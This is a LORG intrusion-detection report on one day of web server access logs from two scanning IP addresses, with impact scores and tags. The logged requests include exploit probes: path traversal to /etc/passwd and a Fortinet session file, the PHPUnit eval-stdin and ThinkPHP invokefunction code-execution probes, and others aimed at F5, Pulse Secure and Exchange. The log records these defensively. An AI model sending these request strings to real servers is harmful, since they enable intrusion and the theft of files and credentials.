LORG Detection Results [lorg]

Summary: 3 incidents discovered from 2 clients

45.33.101.246 | 2 incidents | impact ∑: 28

attacks only

Description: A targeted scan 9 hours ago. A total of 2 incidents where discovered by phpids detection modules.

Impact	Tags	Remote-City	Remote-Host	Remote-Logname	Remote-User	Date	Request	Final-Status	Bytes-Sent	Referer	User-Agent
0	none	-	45.33.101.246	-	-	Mon, 02 Jan 2023 20:38:05 +0100	GET / HTTP/1.0	302	390	-	-
0	none	-	45.33.101.246	-	-	Mon, 02 Jan 2023 20:38:11 +0100	GET / HTTP/1.0	302	6770	-	-
0	none	-	45.33.101.246	-	-	Mon, 02 Jan 2023 20:38:12 +0100	GET /autodiscover/autodiscover.json?@abc.com/owa/?&Email=autodiscover/autodiscover.json?@abc.com HTTP/1.1	302	610	-	curl/7.54.0
0	none	-	45.33.101.246	-	-	Mon, 02 Jan 2023 20:38:12 +0100	PUT /api/v2/cmdb/system/admin/admin HTTP/1.1	302	480	-	Report Runner - Internet Research
0	none	-	45.33.101.246	-	-	Mon, 02 Jan 2023 20:38:12 +0100	POST /casa/nodes/thumbprints HTTP/1.1	302	446	-	Guayoyo - Mozilla/5.0 (compatible; vCenter)
0	none	-	45.33.101.246	-	-	Mon, 02 Jan 2023 20:38:12 +0100	GET / HTTP/1.1	302	420	-	curl/7.54.0
0	none	-	45.33.101.246	-	-	Mon, 02 Jan 2023 20:38:12 +0100	GET /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1	400	408	-	Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
0	none	-	45.33.101.246	-	-	Mon, 02 Jan 2023 20:38:12 +0100	POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1	302	660	-	curl/7.54.0
0	none	-	45.33.101.246	-	-	Mon, 02 Jan 2023 20:38:12 +0100	GET /logon/LogonPoint/tmindex.html HTTP/1.1	302	478	-	Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
0	none	-	45.33.101.246	-	-	Mon, 02 Jan 2023 20:38:12 +0100	GET /rest/applinks/1.0/manifest HTTP/1.1	302	472	-	curl/7.54.0
0	none	-	45.33.101.246	-	-	Mon, 02 Jan 2023 20:38:12 +0100	GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1	404	5946	-	curl/7.54.0
0	none	-	45.33.101.246	-	-	Mon, 02 Jan 2023 20:38:12 +0100	POST /casa/nodes/thumbprints HTTP/1.1	404	5946	-	Guayoyo - Mozilla/5.0 (compatible; vCenter)
0	none	-	45.33.101.246	-	-	Mon, 02 Jan 2023 20:38:12 +0100	PUT /api/v2/cmdb/system/admin/admin HTTP/1.1	405	6009	-	Report Runner - Internet Research
0	none	-	45.33.101.246	-	-	Mon, 02 Jan 2023 20:38:12 +0100	GET /aspnet-ajax/Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1	404	5946	-	curl/7.54.0
0	none	-	45.33.101.246	-	-	Mon, 02 Jan 2023 20:38:12 +0100	GET /rest/applinks/1.0/manifest HTTP/1.1	404	5946	-	curl/7.54.0
0	none	-	45.33.101.246	-	-	Mon, 02 Jan 2023 20:38:12 +0100	GET /logon/LogonPoint/tmindex.html HTTP/1.1	404	5946	-	Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
0	none	-	45.33.101.246	-	-	Mon, 02 Jan 2023 20:38:12 +0100	GET / HTTP/1.1	302	6770	-	curl/7.54.0
0	none	-	45.33.101.246	-	-	Mon, 02 Jan 2023 20:38:12 +0100	GET /autodiscover/autodiscover.json?@abc.com/owa/?&Email=autodiscover/autodiscover.json?@abc.com HTTP/1.1	404	5946	-	curl/7.54.0
13	dt id lfi xss csrf	-	45.33.101.246	-	-	Mon, 02 Jan 2023 20:38:12 +0100	GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1	404	5946	-	curl/7.54.0
0	none	-	45.33.101.246	-	-	Mon, 02 Jan 2023 20:38:12 +0100	GET /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1	400	5978	-	Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
15	xss csrf id rfe dt lfi	-	45.33.101.246	-	-	Mon, 02 Jan 2023 20:38:12 +0100	GET / CSCOT /translation-table?type=mst&textdomain=/+CSCOE+/portal_inc.lua&default-language&lang=../ HTTP/1.1	404	5946	-	curl/7.54.0
0	none	-	45.33.101.246	-	-	Mon, 02 Jan 2023 20:38:12 +0100	POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1	404	5946	-	curl/7.54.0
0	none	-	45.33.101.246	-	-	Mon, 02 Jan 2023 20:38:12 +0100	GET /secure/rest/applinks/1.0/manifest HTTP/1.1	302	486	-	curl/7.54.0
0	none	-	45.33.101.246	-	-	Mon, 02 Jan 2023 20:38:12 +0100	GET /ui/login.action HTTP/1.1	302	432	-	Guayoyo - Mozilla/5.0 (compatible; vCenter)
0	none	-	45.33.101.246	-	-	Mon, 02 Jan 2023 20:38:12 +0100	GET /jira/rest/applinks/1.0/manifest HTTP/1.1	302	482	-	curl/7.54.0
0	none	-	45.33.101.246	-	-	Mon, 02 Jan 2023 20:38:13 +0100	GET /secure/rest/applinks/1.0/manifest HTTP/1.1	404	5946	-	curl/7.54.0
0	none	-	45.33.101.246	-	-	Mon, 02 Jan 2023 20:38:13 +0100	GET /ui/login.action HTTP/1.1	404	5946	-	Guayoyo - Mozilla/5.0 (compatible; vCenter)
0	none	-	45.33.101.246	-	-	Mon, 02 Jan 2023 20:38:13 +0100	GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1	404	5946	-	curl/7.54.0
0	none	-	45.33.101.246	-	-	Mon, 02 Jan 2023 20:38:13 +0100	GET /confluence/rest/applinks/1.0/manifest HTTP/1.1	302	494	-	curl/7.54.0
0	none	-	45.33.101.246	-	-	Mon, 02 Jan 2023 20:38:13 +0100	GET /?rt=Login/Index HTTP/1.1	200	11121	-	curl/7.54.0
0	none	-	45.33.101.246	-	-	Mon, 02 Jan 2023 20:38:13 +0100	GET /bitbucket/rest/applinks/1.0/manifest HTTP/1.1	302	492	-	curl/7.54.0
0	none	-	45.33.101.246	-	-	Mon, 02 Jan 2023 20:38:13 +0100	GET /jira/rest/applinks/1.0/manifest HTTP/1.1	404	5946	-	curl/7.54.0
0	none	-	45.33.101.246	-	-	Mon, 02 Jan 2023 20:38:13 +0100	GET /bamboo/rest/applinks/1.0/manifest HTTP/1.1	302	486	-	curl/7.54.0
0	none	-	45.33.101.246	-	-	Mon, 02 Jan 2023 20:38:14 +0100	GET /crowd/rest/applinks/1.0/manifest HTTP/1.1	302	484	-	curl/7.54.0
0	none	-	45.33.101.246	-	-	Mon, 02 Jan 2023 20:38:14 +0100	GET /confluence/rest/applinks/1.0/manifest HTTP/1.1	404	5946	-	curl/7.54.0
0	none	-	45.33.101.246	-	-	Mon, 02 Jan 2023 20:38:14 +0100	GET /bitbucket/rest/applinks/1.0/manifest HTTP/1.1	404	5946	-	curl/7.54.0
0	none	-	45.33.101.246	-	-	Mon, 02 Jan 2023 20:38:15 +0100	GET /bamboo/rest/applinks/1.0/manifest HTTP/1.1	404	5946	-	curl/7.54.0
0	none	-	45.33.101.246	-	-	Mon, 02 Jan 2023 20:38:15 +0100	GET /crowd/rest/applinks/1.0/manifest HTTP/1.1	404	5946	-	curl/7.54.0

152.89.196.211 | 1 incident | impact ∑: 12

attacks only

Description: A targeted scan and human attacker and random scan yesterday. A total of one incident was discovered by phpids detection modules.

Impact	Tags	Remote-City	Remote-Host	Remote-Logname	Remote-User	Date	Request	Final-Status	Bytes-Sent	Referer	User-Agent
0	none	-	152.89.196.211	-	-	Mon, 02 Jan 2023 02:08:00 +0100	POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1	302	522	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
0	none	-	152.89.196.211	-	-	Mon, 02 Jan 2023 02:08:00 +0100	\x16\x03\x01	400	-	-	-
0	none	-	152.89.196.211	-	-	Mon, 02 Jan 2023 02:22:55 +0100	GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1	302	522	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
0	none	-	152.89.196.211	-	-	Mon, 02 Jan 2023 02:22:55 +0100	\x16\x03\x01	400	-	-	-
0	none	-	152.89.196.211	-	-	Mon, 02 Jan 2023 02:35:37 +0100	GET /solr/admin/info/system?wt=json HTTP/1.1	302	482	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
0	none	-	152.89.196.211	-	-	Mon, 02 Jan 2023 02:35:37 +0100	\x16\x03\x01	400	-	-	-
0	none	-	152.89.196.211	-	-	Mon, 02 Jan 2023 02:42:48 +0100	GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1	302	658	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
0	none	-	152.89.196.211	-	-	Mon, 02 Jan 2023 02:42:48 +0100	\x16\x03\x01	400	-	-	-
12	xss csrf id rfe lfi	-	152.89.196.211	-	-	Mon, 02 Jan 2023 03:06:05 +0100	GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1	302	542	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
0	none	-	152.89.196.211	-	-	Mon, 02 Jan 2023 03:06:05 +0100	\x16\x03\x01	400	-	-	-
0	none	-	152.89.196.211	-	-	Mon, 02 Jan 2023 03:11:57 +0100	GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1	302	482	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
0	none	-	152.89.196.211	-	-	Mon, 02 Jan 2023 03:11:57 +0100	\x16\x03\x01	400	-	-	-
0	none	-	152.89.196.211	-	-	Mon, 02 Jan 2023 03:50:27 +0100	GET /console/ HTTP/1.1	302	438	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
0	none	-	152.89.196.211	-	-	Mon, 02 Jan 2023 03:50:27 +0100	\x16\x03\x01	400	-	-	-
0	none	-	152.89.196.211	-	-	Mon, 02 Jan 2023 04:02:43 +0100	POST /Autodiscover/Autodiscover.xml HTTP/1.1	302	480	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
0	none	-	152.89.196.211	-	-	Mon, 02 Jan 2023 04:02:43 +0100	\x16\x03\x01	400	-	-	-
0	none	-	152.89.196.211	-	-	Mon, 02 Jan 2023 04:08:37 +0100	GET /_ignition/execute-solution HTTP/1.1	302	474	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
0	none	-	152.89.196.211	-	-	Mon, 02 Jan 2023 04:08:37 +0100	\x16\x03\x01	400	-	-	-
0	none	-	152.89.196.211	-	-	Mon, 02 Jan 2023 04:31:29 +0100	GET / HTTP/1.1	302	422	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
0	none	-	152.89.196.211	-	-	Mon, 02 Jan 2023 04:31:29 +0100	\x16\x03\x01	400	-	-	-
0	none	-	152.89.196.211	-	-	Mon, 02 Jan 2023 04:53:11 +0100	GET / HTTP/1.1	302	422	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
0	none	-	152.89.196.211	-	-	Mon, 02 Jan 2023 04:53:11 +0100	\x16\x03\x01	400	-	-	-
0	none	-	152.89.196.211	-	-	Mon, 02 Jan 2023 04:59:29 +0100	GET /actuator/gateway/routes HTTP/1.1	302	468	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
0	none	-	152.89.196.211	-	-	Mon, 02 Jan 2023 04:59:29 +0100	\x16\x03\x01	400	-	-	-
0	none	-	152.89.196.211	-	-	Mon, 02 Jan 2023 11:18:32 +0100	GET / HTTP/1.1	302	6770	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
0	none	-	152.89.196.211	-	-	Mon, 02 Jan 2023 11:18:39 +0100	GET /?rt=Login/Index HTTP/1.1	200	8462	https://91.223.222.18:443	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
0	none	-	152.89.196.211	-	-	Mon, 02 Jan 2023 11:45:14 +0100	GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1	404	6403	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
0	none	-	152.89.196.211	-	-	Mon, 02 Jan 2023 13:03:03 +0100	GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1	302	6770	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
0	none	-	152.89.196.211	-	-	Mon, 02 Jan 2023 14:22:16 +0100	GET / HTTP/1.1	302	6770	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
0	none	-	152.89.196.211	-	-	Mon, 02 Jan 2023 14:22:16 +0100	GET /?rt=Login/Index HTTP/1.1	200	8462	https://91.223.222.18:443	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
0	none	-	152.89.196.211	-	-	Mon, 02 Jan 2023 15:28:48 +0100	GET /actuator/gateway/routes HTTP/1.1	404	5946	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36